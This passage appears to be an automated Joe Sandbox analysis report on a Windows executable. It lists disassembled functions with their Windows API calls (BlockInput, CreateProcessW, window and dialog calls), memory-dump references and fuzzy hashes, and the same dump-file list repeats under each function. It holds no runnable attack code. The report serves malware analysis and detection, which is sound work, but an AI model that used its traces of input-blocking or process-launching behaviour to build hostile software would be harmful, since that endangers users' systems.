                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DialogLongNtdllProc_Window
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2065330234-0
                                                                                                                                  • Opcode ID: dafc69c0af78994c2347a8f8e473e48c5289d177e9e0e9deae5234d91a21375c
                                                                                                                                  • Instruction ID: abb1323ad3a5bc197159ae899d97ad2239f8312289d02690f88d98297b858646
                                                                                                                                  • Opcode Fuzzy Hash: dafc69c0af78994c2347a8f8e473e48c5289d177e9e0e9deae5234d91a21375c
                                                                                                                                  • Instruction Fuzzy Hash: DBF0823460020DDFDB18DF24D8919BA3BA6FB05360F184229F9628B2A1D7B1DC60FB90
                                                                                                                                  Function 00EF703C Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • BlockInput.USER32(00000001), ref: 00EF7057
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: BlockInput
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3456056419-0
                                                                                                                                  • Opcode ID: 2fadd2e5dc0c1912819b50be3f7dbc8381c43b4a1cc98d8ead9e3426566bfc0f
                                                                                                                                  • Instruction ID: 312de6f34d8e1081e02888f0f99d402dd30a49ca94b9aa380f8b46e355a24b16
                                                                                                                                  • Opcode Fuzzy Hash: 2fadd2e5dc0c1912819b50be3f7dbc8381c43b4a1cc98d8ead9e3426566bfc0f
                                                                                                                                  • Instruction Fuzzy Hash: B6E048352142045FC710DF69D404D96F7DDAF58750F00942AFB49E7251DEB0EC009BA0
                                                                                                                                  Function 00F0F3DA Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000232,?,?), ref: 00F0F41A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DialogNtdllProc_
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3239928679-0
                                                                                                                                  • Opcode ID: a2553332158f36889910805c1d03558bee6eb742b97434016b835fb80b43663d
                                                                                                                                  • Instruction ID: af76466b0a6a2fef567ff77840aceb3e7bcd61d55618d576ae319a437e78be3d
                                                                                                                                  • Opcode Fuzzy Hash: a2553332158f36889910805c1d03558bee6eb742b97434016b835fb80b43663d
                                                                                                                                  • Instruction Fuzzy Hash: B0F06D31240249AFDB21DF68DC05FC63BA5FB05360F188418FA51A72E1CBB16820FBA4
                                                                                                                                  Function 00EBAC99 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EBAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00EBAF8E
                                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000007,?,00000000,00000000,?,?), ref: 00EBACC7
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DialogLongNtdllProc_Window
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2065330234-0
                                                                                                                                  • Opcode ID: c757a5c1255b96fc34f5dafde19b117a7cd3a47155790b9c9215b41a8c1bf392
                                                                                                                                  • Instruction ID: 5c22efdd52948f122077e18954f3881492ab52c7e4bb4e7334b81afcc9adf6d0
                                                                                                                                  • Opcode Fuzzy Hash: c757a5c1255b96fc34f5dafde19b117a7cd3a47155790b9c9215b41a8c1bf392
                                                                                                                                  • Instruction Fuzzy Hash: C3E0EC35240208FBCF15AFA0DC52EA93B66FB49354F188428F6556B2A1CA73A522EB51
                                                                                                                                  Function 00F0F425 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000053,?,?,?,00F1F3D4,?,?,?,?,?,?), ref: 00F0F450
                                                                                                                                    • Part of subcall function 00F0E13E: _memset.LIBCMT ref: 00F0E14D
                                                                                                                                    • Part of subcall function 00F0E13E: _memset.LIBCMT ref: 00F0E15C
                                                                                                                                    • Part of subcall function 00F0E13E: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00F63EE0,00F63F24), ref: 00F0E18B
                                                                                                                                    • Part of subcall function 00F0E13E: CloseHandle.KERNEL32 ref: 00F0E19D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _memset$CloseCreateDialogHandleNtdllProc_Process
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2364484715-0
                                                                                                                                  • Opcode ID: 49307472940d70345d91beb8d851e82e04de10b0d0d7652cb2997aaff6cac9ad
                                                                                                                                  • Instruction ID: a078d7554726c6dda69ab3f6d35f6cac8c48e2eada6f7b1d354712216bb710d4
                                                                                                                                  • Opcode Fuzzy Hash: 49307472940d70345d91beb8d851e82e04de10b0d0d7652cb2997aaff6cac9ad
                                                                                                                                  • Instruction Fuzzy Hash: 65E04636100208DFCB21EF18DC05E9A37A2FB08350F058010FA00572B2C771A821FF40
                                                                                                                                  Function 00F0F3AB Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • NtdllDialogWndProc_W.NTDLL ref: 00F0F3D0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DialogNtdllProc_
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3239928679-0
                                                                                                                                  • Opcode ID: 51ed7efff5e8cb177d28f74686c79436519b55ff38a19d34fbc75f14da766ff1
                                                                                                                                  • Instruction ID: e233416d1bf3e53d9b13c42ea10e935f1dd056a596126d50d8f4294c49f697b7
                                                                                                                                  • Opcode Fuzzy Hash: 51ed7efff5e8cb177d28f74686c79436519b55ff38a19d34fbc75f14da766ff1
                                                                                                                                  • Instruction Fuzzy Hash: 7FE0173424020CEFCB01DF98D845E8A3BA5FB1A350F040054FD048B362C7B2A830EBA1
                                                                                                                                  Function 00F0F37C Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • NtdllDialogWndProc_W.NTDLL ref: 00F0F3A1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DialogNtdllProc_
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3239928679-0
                                                                                                                                  • Opcode ID: 5ceb25acc9b352ffcaff188169e681e028bf80614b5fa31d02f7cf012aa9fcba
                                                                                                                                  • Instruction ID: de8c503cdcef0cfb286bbeabd3d31ab6df11901f1e373528b1cdf09e966c61d9
                                                                                                                                  • Opcode Fuzzy Hash: 5ceb25acc9b352ffcaff188169e681e028bf80614b5fa31d02f7cf012aa9fcba
                                                                                                                                  • Instruction Fuzzy Hash: E3E0173424420CEFCB01DF98DC45E8A3BA5FB1A350F040054FD048B361C7B2A830EBA1
                                                                                                                                  Function 00EBB845 Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EBAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00EBAF8E
                                                                                                                                    • Part of subcall function 00EBB86E: DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00EBB85B), ref: 00EBB926
                                                                                                                                    • Part of subcall function 00EBB86E: KillTimer.USER32(00000000,?,00000000,?,?,?,?,00EBB85B,00000000,?,?,00EBAF1E,?,?), ref: 00EBB9BD
                                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000002,00000000,00000000,00000000,?,?,00EBAF1E,?,?), ref: 00EBB864
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$DestroyDialogKillLongNtdllProc_Timer
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2797419724-0
                                                                                                                                  • Opcode ID: 2b77cfde370960358952190051ceeb7f8f3dadf670c26aa6230cd74c2362e2ad
                                                                                                                                  • Instruction ID: b4656d4495a45628b3a55e5af9783cbb4b2d4c06c5a066407ab13848c7d5ade4
                                                                                                                                  • Opcode Fuzzy Hash: 2b77cfde370960358952190051ceeb7f8f3dadf670c26aa6230cd74c2362e2ad
                                                                                                                                  • Instruction Fuzzy Hash: 3BD0127124430C77DF102BA1DC07F9A3A5DAB00750F548430F7057A1E28AB16421A595
                                                                                                                                  Function 00EC8E19 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00EC8E1F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3192549508-0
                                                                                                                                  • Opcode ID: f35f0303b71989c40b43e3a97d1f44c186c901c7e017d76181a19fd8eb7822bd
                                                                                                                                  • Instruction ID: ddfa906aa1482238811a4b0c9875f6940dc13e0b882780ac7c3a1df33e34cdd2
                                                                                                                                  • Opcode Fuzzy Hash: f35f0303b71989c40b43e3a97d1f44c186c901c7e017d76181a19fd8eb7822bd
                                                                                                                                  • Instruction Fuzzy Hash: B1A0243000050CF7FF001F51FC044447F5CD7041507004010F40C00031C7335C1155C3
                                                                                                                                  Function 00ECA937 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetProcessHeap.KERNEL32(00EC6AE9,00F567D8,00000014), ref: 00ECA937
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: HeapProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 54951025-0
                                                                                                                                  • Opcode ID: a19f8f096e0ff98bbacec672441487f44bafbd101e726cdf9709c62c5b626fe7
                                                                                                                                  • Instruction ID: be06209834867750316bacfebaba2633b1a6768cb4632472352d925e8f44bf9d
                                                                                                                                  • Opcode Fuzzy Hash: a19f8f096e0ff98bbacec672441487f44bafbd101e726cdf9709c62c5b626fe7
                                                                                                                                  • Instruction Fuzzy Hash: DDB012B03031064BE70C4B38AC5411B39D55749201311403DB003C2A60DF308420FF00
                                                                                                                                  Function 00EC0EC4 Relevance: .3, Instructions: 345COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                                                                                  • Instruction ID: d15dbce5622e0f73e9d3c8b1c72831284a7e16255c8bf3c0dc96d86e03d5f87c
                                                                                                                                  • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                                                                                  • Instruction Fuzzy Hash: 97C12E722052D389DF2D8639C630E3EFBA05EA27B931A239DD4B3DB4C1EE15C666D510
                                                                                                                                  Function 00EC12F9 Relevance: .3, Instructions: 341COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                                                                                  • Instruction ID: c3e509c167eb392add56a9f6e1475d59f85e214a748c0476b1aa7be0a188e722
                                                                                                                                  • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                                                                                  • Instruction Fuzzy Hash: 54C12C7220529349DF2D863DC630A3EFAA15EA37B931A239DD4B3DB4C1EE25C626D510
                                                                                                                                  Function 00EC0A8F Relevance: .3, Instructions: 330COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 94aa35768ada5db02f87ec79fd7d7f8216fc2ce2641a6285af6ede501d801f86
                                                                                                                                  • Instruction ID: 6dc92b2f3668ff5aae844542e8d22a857145e86ff7822acb1c9e3a9b0dc634b4
                                                                                                                                  • Opcode Fuzzy Hash: 94aa35768ada5db02f87ec79fd7d7f8216fc2ce2641a6285af6ede501d801f86
                                                                                                                                  • Instruction Fuzzy Hash: FEC1FA72205293CADF2D8639C634E7EFBA05EA17B931A275DD4B3EB0C0EE15C625D610
                                                                                                                                  Function 00EC0677 Relevance: .3, Instructions: 323COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                                  • Instruction ID: 86e84e7db5c2c6f50fc472ac97aae5685c9969823ee4821eaab3b34b9631c384
                                                                                                                                  • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                                  • Instruction Fuzzy Hash: 5DC1F87320529389DF1D8639C634E3EFBA15EA17B930A275DD4B3EB4C1EE25C626C610
                                                                                                                                  Function 00EFA750 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 490filecommemoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00EFA7A5
                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00EFA7B7
                                                                                                                                  • DestroyWindow.USER32 ref: 00EFA7C5
                                                                                                                                  • GetDesktopWindow.USER32 ref: 00EFA7DF
                                                                                                                                  • GetWindowRect.USER32(00000000), ref: 00EFA7E6
                                                                                                                                  • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00EFA927
